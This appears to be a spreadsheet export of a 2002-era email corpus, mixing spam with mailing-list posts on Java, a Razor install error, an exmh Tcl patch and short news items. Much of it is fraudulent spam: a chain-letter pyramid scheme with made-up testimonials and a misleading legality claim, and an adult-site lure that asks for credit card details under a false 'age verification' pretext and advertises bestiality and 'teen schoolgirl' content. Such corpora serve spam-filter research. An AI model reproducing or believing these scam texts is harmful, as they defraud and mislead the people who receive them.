 $$$$$$$$$$$$$$$$$$$$$ YOUR SUCCESS GUIDELINES 
 $$$$$$$$$$$$$$$$$$$$$ 
 Follow these guidelines to guarantee your success: 
 === If you do not receive at least 10 orders for Report #1 within 2 
 weeks, continue sending e-mails until you do. 
 === After you have received 10 orders, 2 to 3 weeks after that you 
 should receive 100 orders or more for REPORT # 2. If you did not, continue 
 advertising or sending e-mails until you do. 
 === Once you have received 100 or more orders for Report # 2, YOU CAN 
 RELAX, because the system is already working for you, and the cash will 
 continue to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time your 
 name 
 is moved down on the list, you are placed in front of a Different report. 
 You can KEEP TRACK of your PROGRESS by watching which report 
 people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME 
 SEND 
 ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS 
 AGAIN. There is NO 
 LIMIT to the income you can generate from this business !!! 
 =========================================================
 ======= 
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM: 
 You have just received information that can give you financial freedom 
 for the rest of your life, with NO RISK and JUST A LITTLE BIT OF EFFORT. 
 You can make more money in the next few weeks and months than you have 
 ever imagined. Follow the program EXACTLY AS INSTRUCTED. Do Not change 
 it 
 in 
 any way. It works exceedingly well as it is now. 
 Remember to e-mail a copy of this exciting report after you have put 
 your name and address in Report #1 and moved others to #2 ...........# 5 
 as 
 instructed above. One of the people you send this to may send out 
 100,000 or more e-mails and your name will be on every one of them. 
 Remember 
 though, the more you send out the more potential customers! you will 
 reach. So 
 my friend, I have given you the ideas, information, materials and 
 opportunity to become financially independent. IT IS UP TO YOU NOW ! 
 ====================== MORE 
 TESTIMONIALS====================== 
 '' My name is Mitchell. My wife, Jody and I live in Chicago. I am an 
 accountant with a major U.S. Corporation and I make pretty good 
 money. When I received this program I grumbled to Jody about receiving 
 ''junk mail''. I made fun of the whole thing, spouting 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received total $ 147,200.00 ........... all cash! I was shocked. ! I have 
 joined 
 Jody in her ''hobby''. 
 Mitchell Wolf M.D., Chicago, Illinois 
 =========================================================
 ======= '' Not 
 being the gambling type, it took me several weeks to make up my 
 mind to participate in this plan. But conservative that I am, I decided 
 that the initial investment was so little that there was just no way that 
 I 
 wouldn't get enough orders to at least get my money back''. '' I was 
 surprised 
 when I found my medium size post office box crammed with orders. I made 
 $319,210.00 in the first 12 weeks. The nice thing about this deal is 
 that it does not matter where people live. There simply isn't a better 
 investment 
 with a faster return and so big''. 
 Dan Sondstrom, Alberta, Canada 
 =========================================================
 ======= '' I had 
 received this program before. I deleted it, but later I 
 wondered if I should have given it a try. Of course, I had no idea who 
 to contact ! to get another copy, so I had to wait until I was e-mailed 
 again by someone else.........11 months passed then it luckily came 
 again.....I did not delete this one! I made more than $490,000 on my 
 first try and all the money came within 22 weeks''. 
 Susan De Suza, New York, N.Y. 
 =========================================================
 ====== 
 '' It really is a great opportunity to make relatively easy money with 
 little cost to you. I followed the simple instructions carefully and 
 within 10 days the money started to come in. My first month I made 
 $20,560.00 and by the end of third month my total cash count was $ 
 362,840.00. Life is beautiful, Thanx to internet''. 
 Fred Dellaca, Westport, New Zealand 
 =========================================================
 =======ORDER 
 YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO 
 FINANCIAL FREEDOM ! 
 =========================================================
 ======= 
 If you have any questions of the legality of this program, contact the 
 Office of Associate Director for Marketing Practices, Federal Trade 
 Commission, Bureau of Consumer Protection, Washington, D.C. 
 =========================================================
 ======= 
 THERE IS NO NEED TO RESPOND TO THIS E-MAIL IF YOU DO NOT 
 WISH TO RECEIVE 
 FURTHER CORRESPONDENCE. THIS IS A ONETIME E-MAIL. 
 GOOD LUCK! 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Java is for kiddies
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Reza B'Far (eBuilt) wrote:
 &gt; Hmmm again.... You're telling me that you've never had a nasty bug that took
 &gt; you a couple of days to track down that had to do with a memory leak?  I am
 &gt; not the best C/C++ programmer... not even close... But I've known really
 &gt; good ones... and even they have nasty bugs that have to do with memory
 &gt; management, however occasional they may be.
 OK, noone has been tool-less for memory management for a LONG time. Most
 systems you just add a flag and memory is tracked (that's how i've always
 done it) or worst case yuo have to run it through one of the 2.3E7 tools
 where you simply recompile and it it tells you where the leaks are.
 Memory management is a non-issue for anyone that has any idea at all how the
 hardware functions. Granted, this takes 30 minutes to go over, and so is far
 beyond the scope of the "Learn Java in 90 minutes without thinking" book
 every Java programmer learned from.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] "Can't use and undefined value.." error
</t>
  </si>
  <si>
    <t xml:space="preserve">I just installed razor 2.152 on a FreeBSD 4.4-RELEASE box and having
 problems with razor-check.  Any time razor-check is run, (with or without
 arguments), i get this error:
 Can't use an undefined value as a symbol reference at
 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd/Razor2/Client/Agent.pm
 line 756.
 razor-admin runs just fine and the make test before the install was all
 ok.
 Has anyone seen this before?
 Module versions:
 Digest-HMAC-1.01
 Digest-MD5-2.20
 Digest-Nilsimsa-0.06
 Digest-SHA1-2.01
 MIME-Base64-2.12
 Net-DNS-0.23
 Test-Simple-0.44
 Time-HiRes-01.20
 URI-1.19
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Plans for new youth units blocked
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8689493,215/
 Date: 2002-10-09T03:46:02+01:00
 Brown blocks plans for new secure training centres for teenage offenders.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MIT OpenCourseWare
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Looks useful. Hopefully, they'll put up some more material soon.
 	http://ocw.mit.edu/global/all-courses.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 70 percent off your life insurance   get a free quote instantly.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt; 
 &lt;BODY BGCOLOR="#ffffff" link="#0000FF" vlink="#0000FF" alink="#0000FF"&gt;
 &lt;table width="69%" border="1" cellspacing="2" cellpadding="25" height="345" align="center"&gt;
   &lt;tr&gt;
     &lt;td height="353"&gt;
       &lt;p align="left"&gt;&lt;font back="#ffffff" style="BACKGROUND-COLOR: #ffffff" size="4" ptsize="10" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#999999"&gt;Question:&lt;/font&gt;&lt;font color="#CC3300"&gt; 
         Are You Paying Too Much for Life Insurance?&lt;/font&gt; &lt;/b&gt;&lt;/font&gt;&lt;font  back="#ffffff" style="BACKGROUND-COLOR: #ffffff" size=3 ptsize=10&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font back="#ffffff" style="BACKGROUND-COLOR: #ffffff" size="2" ptsize="10" face="Verdana, Arial, Helvetica, sans-serif"&gt;Most 
         likely the answer is YES!&lt;/font&gt;&lt;font back="#ffffff" style="BACKGROUND-COLOR: #ffffff" size="2" ptsize="10"&gt; 
         &amp;nbsp;&lt;br&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         Here's why. &amp;nbsp;FACT... Fierce, take no prisoner, Insurance Industry 
         PRICE WARS have driven &lt;/font&gt;&lt;font back="#ffffff" style="BACKGROUND-COLOR: #ffffff" size="2" ptsize="10"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;DOWN 
         &lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;premiums 
         - 30 - 40 - 50 - even 70% from where they were just a short time ago!&lt;br&gt;
         &lt;br&gt;
         THAT'S WHY YOUR INSURANCE COMPANY DOESN'T WANT YOU TO READ THIS...&lt;br&gt;
         &lt;br&gt;
         They will continue to take your money at the price they are already charging 
         you, while offering the new lower rates (up to 50%, even 70% lower) to 
         their new buyers ONLY.&lt;br&gt;
         &lt;br&gt;
         BUT, DON'T TAKE OUR WORD FOR IT... &lt;a href="http://ins.visosite.com"&gt;CLICK 
         HERE&lt;/a&gt;&amp;nbsp;and request a FREE online quote. &amp;nbsp;Be prepared for a 
         real shock when you see just how inexpensively you can buy term life insurance 
         for &lt;/font&gt;&lt;font back="#ffffff" style="BACKGROUND-COLOR: #ffffff" size="2" ptsize="10"&gt;&lt;font back="#ffffff" style="BACKGROUND-COLOR: #ffffff" size="2" ptsize="10"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;today&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;!&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align="center"&gt;&lt;br&gt;
   &lt;br&gt;
   _____________________________________________________________________________________________&lt;/p&gt;
 &lt;table width="64%" border="0" cellspacing="0" cellpadding="4" align="center" height="23"&gt;
   &lt;tr&gt;
     &lt;td height="42"&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif" color="#999999"&gt;REMOVAL 
       INSTRUCTIONS: This message is sent in compliance with the proposed BILL 
       section 301, Paragraph (a) (2) (c) of S.1618. We obtain our list data from 
       a variety of online sources, including opt-in lists. This email is sent 
       by a direct email marketing firm on our behalf, and if you would rather 
       not receive any further information from us, please &lt;a href="mailto:takemeoffnow1020@ahpcorp.com?subject=REMOVE"&gt;CLICK 
       HERE&lt;/a&gt;. In this way, you can instantly &amp;#147;opt-out&amp;#148; from the list 
       your email address was obtained from, whether this was an &amp;quot;opt-in&amp;quot; 
       or otherwise. Please accept our apologies if this message has reached you 
       in error. Please allow 5-10 business days for your email address to be removed 
       from all lists in our control. Meanwhile, simply delete any duplicate emails 
       that you may receive and rest assured that your request to be taken off 
       this list will be honored. If you have previously requested to be taken 
       off this list and are still receiving this message, you may call us at 1-(888) 
       817-9902, or write to us at: Abuse Control Center, 7657 Winnetka Ave., Canoga 
       Park, CA 91306&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align=center&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;FONT  BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=3 PTSIZE=10&gt;&lt;BR&gt;
   &lt;/FONT&gt;&lt;/p&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] ilug,Bigger, Fuller Breasts Naturally In Just Weeks
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Your VIP Pass
</t>
  </si>
  <si>
    <t xml:space="preserve">###################################
   FREE Adult Lifetime Membership
       Limited Time Offer!!!
 ###################################
 YOUR INSTANT ACCESS PASSWORD
 LOGIN NAME:   zzzz@spamassassin.taint.org 
 PASSWORD:     AcKWGy4L
 5 of the Best Adult Sites on the Internet for FREE!
 ---------------------------
 NEWS 08/25/02
 Over 3.1 Million Members have signed up for FREE, Last month 229,947
 New Members signed up for Free with the limited time offer.
 Are you a FREE Member yet???
 ---------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 5 adult membership sites for free?
 A. We have advertisers that pay us for ad space so you don't have to
 pay for a membership.
 Q. Is it true that your membership is Free for life?
 A. Absolutely, you'll never have to pay a cent the advertisers do.
 Q. Do I have to sign up for all 5 FREE membership sites?
 A. No, just one to get access to all of them.
 Q. Why do I have to give my Credit Card Information?
 A. It's for age verification purposes only and you will not be charged.
    If you don't believe us, just read their terms and conditions.
 Q. How do I get started?
 A. Click on one of the links below to become a Free member.
 ---------------------------
 # 5. &gt; Adults Farm
 http://80.71.66.8/farm/?aid=993751
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 # 4. &gt; Sexy Celebes
 http://80.71.66.8/celebst/?aid=993751
 Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!
 # 3. &gt; Play House Porn
 http://80.71.66.8/play/?aid=993751
 Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!
 # 2. &gt; Lesbian Lace
 http://80.71.66.8/lesbian/?aid=993751
 Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!
 # 1. &gt; Teen Sex Fantasies
 http://80.71.66.8/teen/?aid=993751
 Teen Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyfriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!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http://80.71.66.8/optout/index.html Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange
 Promotion and Privacy Protection Act. section 50 marked as
 'Advertisement' with valid 'removal' instruction.
 tkuejsrfkmtpfwldpnauksv
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Anolther sequence related traceback
</t>
  </si>
  <si>
    <t xml:space="preserve">I have some patches that seem to fix/avoid this problem now.   (It is
 amazing what one can achieve when mains power fails, long enough for
 UPS's to run out, and all that is left operational is the laptop and
 its battery supply...)
 First, I put in some defensive code into the area where the problem was
 occurring, so that if exmh is attempting (for any reason) to expand a
 sequence that isn't either a number, or a range of numbers (or a list of
 such things) it will simply ignore the trash, rather than giving a traceback.
 This one solves the initial problem:
 --- mh.tcl.WAS	Thu Aug 22 21:15:06 2002
 +++ mh.tcl	Wed Aug 28 12:39:11 2002
 @@ -487,6 +487,10 @@
      set seq {}
      set rseq {}
      foreach range [split [string trim $sequence]] {
 +	if ![regexp {^[0-9]+(-[0-9]+)?$} $range] {
 +	    # just ignore anything bogus
 +	    continue;
 +	}
  	set parts [split [string trim $range] -]
  	if {[llength $parts] == 1} {
  	    lappend seq $parts
 That is amending proc MhSeqExpand which is where the error was occurring
 before (the code assumes that $range is either NNN or NNN-MMM so we should
 probably make sure that's true - issue an error instead of just "continue"
 if you like, but I don't think an error is needed).
 But that just allowed me to create a similar problem, in another place,
 by typing "NNN-" ... and rather than continue to fight fires like this,
 I thought I should think more about Brent's suggestion.   But rather than
 have the selection code actually validate the input, which would mean it
 would have to know what is to be valid, I decided that the right thing to
 do is just to ignore any errors caused by invalid input, so I just stuck
 a "catch" around the MsgShow that is processing the nonsense that the
 user has typed.
 This way, any later expansion to what MsgShow treats as legal (maybe
 allowing a sequence name, like "prev" or "next", or anything else can
 be handled just there, without someone needing to remember that they have
 to go fix the selection processing code to allow it.
 But, while I was playing there, I noticed something I never new before.
 If you type "66+" the "66" changes to "67" (and so on, for each + that
 is typed).   I suspect that's perhaps an artifact of "+ is bound to a
 different function so it can be used as a toggle between changing the
 current and the target folder, but it has to mean something if the current
 input mode is a message number, so let it mean...", but now I found it,
 I think its nice.    But if we can type 66+ why not 66- as well?  That
 kind of limitation bugs me, so I fixed it.
 And then I wondered about folders with names containing '+' - the special
 use of + as the toggle character means there's no way to type those from
 the keyboard.   So I fixed that as well.   This makes two different
 restrictions - there's no way to type a folder name that has a name
 beginning with '+' (but such a thing in MH would be a pain to use anyway,
 so I doubt this will bother anyone), and it is now only possible to
 toggle between typing the current &amp; target folder name when the name
 being typed is empty.   I'm less happy about that part, but I think I
 can live with it in order to allow folder names with +'s in them to
 exist and be typed.
 Then, since I was there anyway, I decided to do something about another
 feature that has always bugged me.   In "normal" keyboard mode, 's' is
 the key used to show a message.    But if you've just typed 123, and
 the FTOC is highlighting 123 as the current message, and you want to now
 show that message, you can't type 's', you have to type \r instead.
 So I "fixed" this one as well.   "Fixed" here is in quotes, as it assumes
 that the keybinding for MsgShow is 's', if you change that to something
 else, it will remain 's' in here.   I don't know enough tk/tcl to have it
 discover what key is bound to a function in the external world in order
 to bind the same one here.   \r continues to work of course.
 And now I got started in fixing irritants in this code, I also made it
 clear the status line if you abort message/folder entry mode (^C or ^G).
 Previously it used to leave the prompt sitting there until the next
 message appeared, which made it less than obvious that the keyboard had
 reverted to its usual bindings.
 In any case, what follows is the patch that does all of that.   I believe
 that if you apply this, then the one above is probably not needed, the
 "catch" around the "MsgShow" will hide the problem (I don't think we really
 need to fix Brent's way of invoking it).   Or include it anyway, just
 for completeness (I haven't run an exmh with the following patch, but not
 the previous one, so I don't know for sure that all will be OK then).
 kre
 --- select.tcl.WAS	Thu Aug 22 21:15:07 2002
 +++ select.tcl	Wed Aug 28 13:36:17 2002
 @@ -49,9 +49,11 @@
      bindtags $w [list $w Entry]
      bind $w &lt;Any-Key&gt;	{SelectTypein %W %A}
      bind $w &lt;Key-plus&gt;	{SelectToggle %W }
 +    bind $w &lt;Key-minus&gt;	{SelectPrev %W }
      bind $w &lt;space&gt;	{SelectComplete %W}
      bind $w &lt;Tab&gt;	{SelectComplete %W}
      bind $w &lt;Return&gt;	{SelectReturn %W}
 +    bind $w &lt;Key-s&gt;	{SelectReturn %W %A}
      bind $w &lt;BackSpace&gt;	{SelectBackSpace %W}
      bind $w &lt;Control-h&gt;	{SelectBackSpace %W}
      bind $w &lt;Delete&gt;	{SelectBackSpace %W}
 @@ -72,7 +74,7 @@
      append select(sel) $a
      Exmh_Status "$select(prompt) $select(sel)"
      if ![info exists select(folder)] {
 -	Msg_Change $select(sel) noshow
 +	catch { Msg_Change $select(sel) noshow }
      }
  }
  proc SelectBackSpace { w } {
 @@ -91,6 +93,10 @@
  proc SelectToggle {w} {
      global select
      if [info exists select(folder)] {
 +	if {$select(sel) != ""} {
 +	    SelectTypein $w +
 +	    return
 +	}
  	set select(toggle) [list [lindex $select(toggle) 1] [lindex $select(toggle) 0]]
  	set select(prompt) "[lindex $select(toggle) 0] Folder:"
      } else {
 @@ -101,6 +107,18 @@
      }
      Exmh_Status "$select(prompt) $select(sel)"
  }
 +proc SelectPrev {w} {
 +    global select
 +    if [info exists select(folder)] {
 +	SelectTypein $w "-"
 +    } else {
 +	catch {
 +	    incr select(sel) -1
 +	    Msg_Change $select(sel) noshow
 +	}
 +        Exmh_Status "$select(prompt) $select(sel)"
 +    }
 +}
  proc SelectComplete { w } {
      global select
      if [info exists select(folder)] {
 @@ -126,9 +144,13 @@
  	Exmh_Status "$select(prompt) $select(sel)"
      }
  }
 -proc SelectReturn { w } {
 +proc SelectReturn { w {a {}} } {
      global select
      if [info exists select(folder)] {
 +	if {$a != {}} {
 +	    SelectTypein $w $a
 +	    return
 +	}
  	if [info exists select(match)] {
  	    set select(sel) $select(match)
  	    unset select(match)
 @@ -151,6 +173,7 @@
  	unset select(folder)
      }
      $select(entry) configure -state disabled
 +    Exmh_Status ""
      Exmh_Focus
  }
  proc SelectClear { w } {
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-19
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 How much does Perl, PHP, Java, or Lisp suck?
     posted by pudge on Wednesday September 18, @08:08 (links)
     http://use.perl.org/article.pl?sid=02/09/17/189201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</si>
  <si>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Steven Levy's wireless neighbors
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534626
 Date: Not supplied
 After discovering an open wireless net available from his sofa, Steven 
 "Hackers" Levy interviewed lawmen, academics and WiFi activists about the 
 legality and ethics of using open wireless access points. 
     I downloaded my mail and checked media news on the Web. When I confessed 
     this to FBI agent Bill Shore, he spared the handcuffs. "The FBI wouldn't 
     waste resources on that," he sniffed. Now I know that if it did, it would 
     be hard to argue that I broke a law. What's more, I certainly didn't feel 
     illegal. Becauseand this is the point of all that war-driving and 
     -chalking and node-stumblingwhen you get used to wireless, the experience 
     feels more and more like a God-given right. One day we may breathe 
     bandwidth like oxygenand arguing its illegality will be unthinkable.  
 Link[1] Discuss[2] (_Thanks, Steven[3]!_)
 [1] http://www.msnbc.com/news/816606.asp
 [2] http://www.quicktopic.com/boing/H/f5ZpuJU5975K
 [3] http://www.echonyc.com/~steven/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free for you... qwof
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" color="#FF0000"&gt;Fire Your Boss...&lt;/font&gt;&lt;/b&gt;&lt;font size="5"&gt;&lt;br&gt;
 &lt;/font&gt;Say &amp;quot;Goodbye&amp;quot; to the 9-5!&lt;/p&gt;
 &lt;font FACE="Times New Roman" SIZE="3"&gt;
 &lt;p align="center"&gt;Tired of working to make someone else wealthy?&lt;/p&gt;
 &lt;p align="center"&gt;FREE tape teaches you how to make YOU wealthy!&lt;/p&gt;
 &lt;p align="center"&gt;&lt;a href="mailto:reachme@btamail.net.cn?subject=free-tape"&gt;Click here and 
 send your name and mailing address for a free copy&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/font&gt;&lt;font FACE="Times New Roman" size="2"&gt;
 &lt;p align="center"&gt;&lt;a href="mailto:removals@btamail.net.cn"&gt;To unsubscribe click 
 here&lt;/a&gt;&lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt; 
 ndmcshjjevibsvurgdvmldytkkogshjm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: More than 100,000 U.S. Jobs Available
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0108_01C206E1.3013D6D0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Are you looking for a job?
 Are you planning for a career change?
 Does your current job pay you little than the salary you deserved?
 Do you want information about who is currently hiring and their rates?
 If you answer "yes" to any of the above questions, then visiting
 JobGalleries.com &lt;http://www.Jobgalleries.com/Default.Asp?ID=Adsini&gt;
 might help you.
 JobGalleries.com &lt;http://www.Jobgalleries.com/Default.Asp?ID=Adsini&gt;
 allows you to search for jobs, save your resume and cover letters, Apply
 on line, and create a job search agent. And more, JobGalleries.com
 &lt;http://www.Jobgalleries.com/Default.Asp?ID=Adsini&gt;  services to job
 seekers is 100% FREE
 JobGalleries.com &lt;http://www.Jobgalleries.com/Default.Asp?ID=Adsini&gt;  is
 definitely one of the TOP career site in the internet. 
 Visit JobGalleries.com
 &lt;http://www.Jobgalleries.com/Default.Asp?ID=Adsini&gt;  and access more
 than 100,000 U.S. Jobs.
 For Employer and Recruiter:
 Avail 75% discount at JobGalleries.com
 &lt;http://www.Jobgalleries.com/Employer/Products.Asp?OC=Adsini531&gt; 's
 Services for 1 year By using the this offercode "ADSINI531" or simply by
 clicking this link - JobGalleries.com
 &lt;http://www.Jobgalleries.com/Employer/Products.Asp?OC=Adsini531&gt; 
 To Unsubscribe click here
 &lt;http://www.Adsini.com/UnSubscribe.asp?Id=7427771&gt; . or simply reply to
 this e-mail and type "REMOVE" in the subject line
 ------=_NextPart_000_0108_01C206E1.3013D6D0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;&lt;Body&gt;Are you looking for a job?&lt;BR&gt;Are you planning for a career =
 change?&lt;BR&gt;Does your current job pay you little than the salary you =
 deserved?&lt;BR&gt;Do you want information about who is currently hiring and =
 their rates?&lt;P&gt;If you answer "&lt;B&gt;yes&lt;/B&gt;" to any of the above questions, =
 then visiting &lt;A =
 href=3D"http://www.Jobgalleries.com/Default.Asp?ID=3DAdsini"&gt;JobGalleries=
 com&lt;/A&gt; might help you.&lt;P&gt;&lt;A =
 href=3D"http://www.Jobgalleries.com/Default.Asp?ID=3DAdsini"&gt;JobGalleries=
 com&lt;/A&gt; allows you to search for jobs, save your resume and cover =
 letters, Apply on line, and create a job search agent. And more, &lt;A =
 href=3D"http://www.Jobgalleries.com/Default.Asp?ID=3DAdsini"&gt;JobGalleries=
 com&lt;/A&gt; services to job seekers is &lt;B&gt;100% &lt;Font =
 color=3D"Red"&gt;FREE&lt;/B&gt;&lt;/Font&gt;&lt;P&gt;&lt;A =
 href=3D"http://www.Jobgalleries.com/Default.Asp?ID=3DAdsini"&gt;JobGalleries=
 com&lt;/A&gt; is definitely one of the TOP career site in the internet. =
 &lt;P&gt;Visit &lt;A =
 href=3D"http://www.Jobgalleries.com/Default.Asp?ID=3DAdsini"&gt;JobGalleries=
 com&lt;/A&gt; and access more than 100,000 U.S. Jobs.&lt;P&gt;&lt;BR&gt;For Employer and =
 Recruiter:&lt;P&gt;Avail 75% discount at &lt;A =
 href=3D"http://www.Jobgalleries.com/Employer/Products.Asp?OC=3DAdsini531"=
 &gt;JobGalleries.com&lt;/A&gt;'s Services for 1 year By using the this offercode =
 "&lt;B&gt;ADSINI531&lt;/B&gt;" or simply by clicking this link - &lt;A =
 href=3D"http://www.Jobgalleries.com/Employer/Products.Asp?OC=3DAdsini531"=
 &gt;JobGalleries.com&lt;/A&gt;&lt;P&gt;&lt;Font size=3D2&gt;To Unsubscribe &lt;A =
 href=3D"http://www.Adsini.com/UnSubscribe.asp?Id=3D7427771"&gt;click =
 here&lt;/A&gt;. or simply reply to this e-mail and type "REMOVE" in the =
 subject line
 ------=_NextPart_000_0108_01C206E1.3013D6D0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Seaman recalled for Euro campaign
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597654,215/
 Date: 2002-10-06T02:28:01+01:00
 *Football: *David Seaman to carry on as England goalkeeper when their European 
 Championship qualifying programme begins in Slovakia on Saturday.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lance Knobel of Davos Newbies does a quick review of Tony Blair's
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:4:19:42AM
 Date: Tue, 24 Sep 2002 11:19:42 GMT
 Lance Knobel[1] of Davos Newbies does a quick review of Tony Blair's case 
 against Sadam Hussein.
 [1] http://www.davosnewbies.com/2002/09/24#theDossier
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MSNBC: Rates Hit 35 year Low 4.75% ...12021
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content=3D"MSHTML 5.00.3502.5390" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;/DIV&gt;
 &lt;TABLE align=3Dcenter border=3D1 borderColor=3D#000099 cellPadding=3D0 cel=
 lSpacing=3D0 
 width=3D"60%"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=3D#000066&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ff9933 face=3DArial size=3D6&gt;&lt;SPAN 
       class=3D865565316-27082002&gt;&lt;STRONG&gt;&lt;EM&gt;&lt;font color=3D"#00FF00"&gt;Don't=
  Wait! Refinance 
           Now!!&lt;/font&gt;&lt;/EM&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
         &lt;P align=3Dcenter&gt;&lt;FONT color=3D#00FF00 face=3DArial size=3D4&gt;&lt;SPA=
 N 
       class=3D865565316-27082002&gt;&lt;STRONG&gt;&lt;EM&gt;Take Advantage of the Lowest =
 Rates 
           In Decades!&lt;/EM&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;TABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle&gt;
             &lt;P&gt;&amp;nbsp;&lt;/P&gt;
                 &lt;P align=3D"center"&gt;&lt;FONT face=3DArial&gt;&lt;FONT color=3D#0000=
 66 size=3D6&gt;&lt;SPAN&gt;&lt;FONT 
             color=3D#0000ff size=3D2&gt;&lt;SPAN class=3D865565316-27082002&gt;&lt;FON=
 T 
             size=3D5&gt;&lt;STRONG&gt;Rates&amp;nbsp;may only go higher!&lt;/STRONG&gt;&lt;/FONT=
 &gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
                 &lt;P align=3D"center"&gt;&lt;FONT face=3D"Verdana, Arial, Helvetic=
 a, sans-serif"&gt;&lt;STRONG&gt;&lt;SPAN 
             class=3D865565316-27082002&gt;&lt;FONT color=3D#0000ff face=3DArial =
 size=3D2&gt;&lt;FONT 
             color=3D#000000&gt;&lt;FONT size=3D4&gt;&lt;FONT face=3DVerdana&gt;LOWER YOUR=
  PAYMENT AND 
                   LOWER YOU&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT 
             face=3DVerdana size=3D4&gt;R RATE!!!&amp;nbsp;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/=
 SPAN&gt;&amp;nbsp;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
